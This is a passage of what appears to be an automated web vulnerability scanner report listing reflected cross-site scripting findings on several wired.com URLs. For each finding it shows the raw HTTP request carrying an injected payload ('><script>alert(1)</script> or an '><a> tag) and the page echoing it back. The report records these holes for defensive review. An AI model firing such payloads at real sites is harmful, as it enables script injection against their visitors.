1.74. http://www.wired.com/culture/art/multimedia/2008/07/gallery_faves_food [slideView parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.wired.com
Path:   /culture/art/multimedia/2008/07/gallery_faves_food

Issue detail

The value of the slideView request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8cbdd"><script>alert(1)</script>6a2fa36c36 was submitted in the slideView parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /culture/art/multimedia/2008/07/gallery_faves_food?slide=7&slideView=18cbdd"><script>alert(1)</script>6a2fa36c36 HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
Content-Language: en-US
Content-Type: text/html; charset=UTF-8
Cache-Control: max-age=600
Expires: Sun, 21 Nov 2010 23:16:56 GMT
Date: Sun, 21 Nov 2010 23:06:56 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 40168


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xht
...[SNIP]...
<a href="javascript: void(window.open('/print/culture/art/multimedia/2008/07/gallery_faves_food?slide=7&slideView=18cbdd"><script>alert(1)</script>6a2fa36c36', 'printImage', 'height=800,width=1000,directories=no,location=no,menubar=no,resizable=yes,status=no,toolbar=no'))" id="printico" rel="nofollow">
...[SNIP]...

1.75. http://www.wired.com/culture/art/multimedia/2008/07/gallery_top_10_food [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.wired.com
Path:   /culture/art/multimedia/2008/07/gallery_top_10_food

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload bb54d"><a>c56f61c551c was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /culturebb54d"><a>c56f61c551c/art/multimedia/2008/07/gallery_top_10_food HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 404 Not Found
Server: Apache/2.0.52 (Red Hat)
Content-Type: text/html; charset=UTF-8
Content-Length: 29303
Vary: Accept-Encoding
Cache-Control: max-age=600
Expires: Sun, 21 Nov 2010 23:16:56 GMT
Date: Sun, 21 Nov 2010 23:06:56 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt
...[SNIP]...
<body class="s_culturebb54d"><a>c56f61c551c ss_art c_multimedia">
...[SNIP]...

1.76. http://www.wired.com/culture/art/multimedia/2008/07/gallery_top_10_food [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.wired.com
Path:   /culture/art/multimedia/2008/07/gallery_top_10_food

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c7c4c"><a>89e1688aab6 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /culture/artc7c4c"><a>89e1688aab6/multimedia/2008/07/gallery_top_10_food HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 404 Not Found
Server: Apache/2.0.52 (Red Hat)
Content-Type: text/html; charset=UTF-8
Content-Length: 29303
Vary: Accept-Encoding
Cache-Control: max-age=600
Expires: Sun, 21 Nov 2010 23:17:17 GMT
Date: Sun, 21 Nov 2010 23:07:17 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt
...[SNIP]...
<body class="s_culture ss_artc7c4c"><a>89e1688aab6 c_multimedia">
...[SNIP]...

1.77. http://www.wired.com/culture/art/multimedia/2008/07/gallery_top_10_food [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.wired.com
Path:   /culture/art/multimedia/2008/07/gallery_top_10_food

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d71fa"><a>b579a399708 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /culture/art/multimediad71fa"><a>b579a399708/2008/07/gallery_top_10_food HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 404 Not Found
Server: Apache/2.0.52 (Red Hat)
Content-Type: text/html; charset=UTF-8
Content-Length: 29303
Vary: Accept-Encoding
Cache-Control: max-age=600
Expires: Sun, 21 Nov 2010 23:17:33 GMT
Date: Sun, 21 Nov 2010 23:07:33 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt
...[SNIP]...
<body class="s_culture ss_art c_multimediad71fa"><a>b579a399708">
...[SNIP]...

1.78. http://www.wired.com/culture/art/multimedia/2008/07/gallery_top_10_food [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.wired.com
Path:   /culture/art/multimedia/2008/07/gallery_top_10_food

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c8377"><script>alert(1)</script>a852d762798 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /culture/art/multimedia/2008/07/gallery_top_10_food?c8377"><script>alert(1)</script>a852d762798=1 HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
Content-Language: en-US
Content-Type: text/html; charset=UTF-8
Cache-Control: max-age=600
Expires: Sun, 21 Nov 2010 23:16:56 GMT
Date: Sun, 21 Nov 2010 23:06:56 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 41077


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xht
...[SNIP]...
<a href="javascript: void(window.open('/print/culture/art/multimedia/2008/07/gallery_top_10_food?c8377"><script>alert(1)</script>a852d762798=1', 'printImage', 'height=800,width=1000,directories=no,location=no,menubar=no,resizable=yes,status=no,toolbar=no'))" id="printico" rel="nofollow">
...[SNIP]...

1.79. http://www.wired.com/culture/art/multimedia/2008/10/gallery_trains [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.wired.com
Path:   /culture/art/multimedia/2008/10/gallery_trains

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload fc57e"><a>6479810cedb was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /culturefc57e"><a>6479810cedb/art/multimedia/2008/10/gallery_trains HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 404 Not Found
Server: Apache/2.0.52 (Red Hat)
Content-Type: text/html; charset=UTF-8
Content-Length: 29298
Vary: Accept-Encoding
Cache-Control: max-age=600
Expires: Sun, 21 Nov 2010 23:16:22 GMT
Date: Sun, 21 Nov 2010 23:06:22 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt
...[SNIP]...
<body class="s_culturefc57e"><a>6479810cedb ss_art c_multimedia">
...[SNIP]...

1.80. http://www.wired.com/culture/art/multimedia/2008/10/gallery_trains [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.wired.com
Path:   /culture/art/multimedia/2008/10/gallery_trains

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 287df"><a>b9badeee24d was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /culture/art287df"><a>b9badeee24d/multimedia/2008/10/gallery_trains HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 404 Not Found
Server: Apache/2.0.52 (Red Hat)
Content-Type: text/html; charset=UTF-8
Content-Length: 29298
Vary: Accept-Encoding
Cache-Control: max-age=600
Expires: Sun, 21 Nov 2010 23:16:43 GMT
Date: Sun, 21 Nov 2010 23:06:43 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt
...[SNIP]...
<body class="s_culture ss_art287df"><a>b9badeee24d c_multimedia">
...[SNIP]...

1.81. http://www.wired.com/culture/art/multimedia/2008/10/gallery_trains [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.wired.com
Path:   /culture/art/multimedia/2008/10/gallery_trains

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5771a"><a>9832fc9791e was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /culture/art/multimedia5771a"><a>9832fc9791e/2008/10/gallery_trains HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 404 Not Found
Server: Apache/2.0.52 (Red Hat)
Content-Type: text/html; charset=UTF-8
Content-Length: 29298
Vary: Accept-Encoding
Cache-Control: max-age=600
Expires: Sun, 21 Nov 2010 23:16:58 GMT
Date: Sun, 21 Nov 2010 23:06:58 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt
...[SNIP]...
<body class="s_culture ss_art c_multimedia5771a"><a>9832fc9791e">
...[SNIP]...

1.82. http://www.wired.com/culture/art/multimedia/2008/10/gallery_trains [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.wired.com
Path:   /culture/art/multimedia/2008/10/gallery_trains

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d54b5"><script>alert(1)</script>ea506289b5c was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /culture/art/multimedia/2008/10/gallery_trains?d54b5"><script>alert(1)</script>ea506289b5c=1 HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
Content-Language: en-US
Content-Type: text/html; charset=UTF-8
Cache-Control: max-age=600
Expires: Sun, 21 Nov 2010 23:16:22 GMT
Date: Sun, 21 Nov 2010 23:06:22 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 42193


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xht
...[SNIP]...
<a href="javascript: void(window.open('/print/culture/art/multimedia/2008/10/gallery_trains?d54b5"><script>alert(1)</script>ea506289b5c=1', 'printImage', 'height=800,width=1000,directories=no,location=no,menubar=no,resizable=yes,status=no,toolbar=no'))" id="printico" rel="nofollow">
...[SNIP]...

1.83. http://www.wired.com/culture/art/news/2008/06/submissions_food [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.wired.com
Path:   /culture/art/news/2008/06/submissions_food

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c1308"><a>62b113b6ddc was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /culturec1308"><a>62b113b6ddc/art/news/2008/06/submissions_food HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 404 Not Found
Server: Apache/2.0.52 (Red Hat)
Content-Type: text/html; charset=UTF-8
Content-Length: 29288
Vary: Accept-Encoding
Cache-Control: max-age=600
Expires: Sun, 21 Nov 2010 23:17:15 GMT
Date: Sun, 21 Nov 2010 23:07:15 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt
...[SNIP]...
<body class="s_culturec1308"><a>62b113b6ddc ss_art c_news">
...[SNIP]...

1.84. http://www.wired.com/culture/art/news/2008/06/submissions_food [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.wired.com
Path:   /culture/art/news/2008/06/submissions_food

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 33b07"><a>51bc0c4125e was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /culture/art33b07"><a>51bc0c4125e/news/2008/06/submissions_food HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 404 Not Found
Server: Apache/2.0.52 (Red Hat)
Content-Type: text/html; charset=UTF-8
Content-Length: 29288
Vary: Accept-Encoding
Cache-Control: max-age=600
Expires: Sun, 21 Nov 2010 23:17:37 GMT
Date: Sun, 21 Nov 2010 23:07:37 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt
...[SNIP]...
<body class="s_culture ss_art33b07"><a>51bc0c4125e c_news">
...[SNIP]...

1.85. http://www.wired.com/culture/art/news/2008/06/submissions_food [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.wired.com
Path:   /culture/art/news/2008/06/submissions_food

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b8ea3"><a>733ee83aeca was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /culture/art/newsb8ea3"><a>733ee83aeca/2008/06/submissions_food HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 404 Not Found
Server: Apache/2.0.52 (Red Hat)
Content-Type: text/html; charset=UTF-8
Content-Length: 29288
Vary: Accept-Encoding
Cache-Control: max-age=600
Expires: Sun, 21 Nov 2010 23:17:49 GMT
Date: Sun, 21 Nov 2010 23:07:49 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt
...[SNIP]...
<body class="s_culture ss_art c_newsb8ea3"><a>733ee83aeca">
...[SNIP]...

1.86. http://www.wired.com/culture/culturereviews [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.wired.com
Path:   /culture/culturereviews

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b187a"><a>710ea181819 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /cultureb187a"><a>710ea181819/culturereviews HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 404 Not Found
Server: Apache/2.0.52 (Red Hat)
Content-Type: text/html; charset=UTF-8
Content-Length: 29273
Vary: Accept-Encoding
Cache-Control: max-age=227
Expires: Sun, 21 Nov 2010 23:09:50 GMT
Date: Sun, 21 Nov 2010 23:06:03 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt
...[SNIP]...
<body class="s_cultureb187a"><a>710ea181819 ss_culturereviews">
...[SNIP]...

1.87. http://www.wired.com/culture/culturereviews [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.wired.com
Path:   /culture/culturereviews

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c101a"><a>c9bdd73e8c4 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /culture/culturereviewsc101a"><a>c9bdd73e8c4 HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 404 Not Found
Server: Apache/2.0.52 (Red Hat)
Content-Type: text/html; charset=UTF-8
Content-Length: 29273
Vary: Accept-Encoding
Cache-Control: max-age=600
Expires: Sun, 21 Nov 2010 23:16:27 GMT
Date: Sun, 21 Nov 2010 23:06:27 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt
...[SNIP]...
<body class="s_culture ss_culturereviewsc101a"><a>c9bdd73e8c4">
...[SNIP]...

1.88. http://www.wired.com/culture/design [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.wired.com
Path:   /culture/design

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e3632"><a>7fc96fc4812 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /culturee3632"><a>7fc96fc4812/design HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 404 Not Found
Server: Apache/2.0.52 (Red Hat)
Content-Type: text/html; charset=UTF-8
Content-Length: 29257
Vary: Accept-Encoding
Cache-Control: max-age=240
Expires: Sun, 21 Nov 2010 23:10:03 GMT
Date: Sun, 21 Nov 2010 23:06:03 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt
...[SNIP]...
<body class="s_culturee3632"><a>7fc96fc4812 ss_design">
...[SNIP]...

1.89. http://www.wired.com/culture/design [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.wired.com
Path:   /culture/design

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4088a"><a>cab77e397f3 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /culture/design4088a"><a>cab77e397f3 HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
